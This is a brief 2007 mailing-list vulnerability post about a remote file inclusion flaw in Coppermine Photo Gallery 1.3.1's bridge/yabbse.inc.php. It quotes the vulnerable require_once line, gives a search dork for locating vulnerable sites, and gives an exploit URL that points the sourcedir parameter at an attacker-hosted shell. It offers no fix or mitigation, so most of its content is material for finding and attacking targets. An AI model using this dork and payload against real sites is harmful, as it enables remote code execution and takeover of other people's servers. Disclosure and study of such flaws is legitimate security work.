Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

master-of-desastor Wed, 08 Aug 2007 12:25:13 -0700

Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability


DoRk:"Powered by Coppermine Photo Gallery"
Vuln. code: 
require_once("$sourcedir/Load.php");require_once("$sourcedir/Security.php");
Exploit:
www.server.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL]
Author:Ma$tEr-0F-De$a$t0r

Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

Reply via email to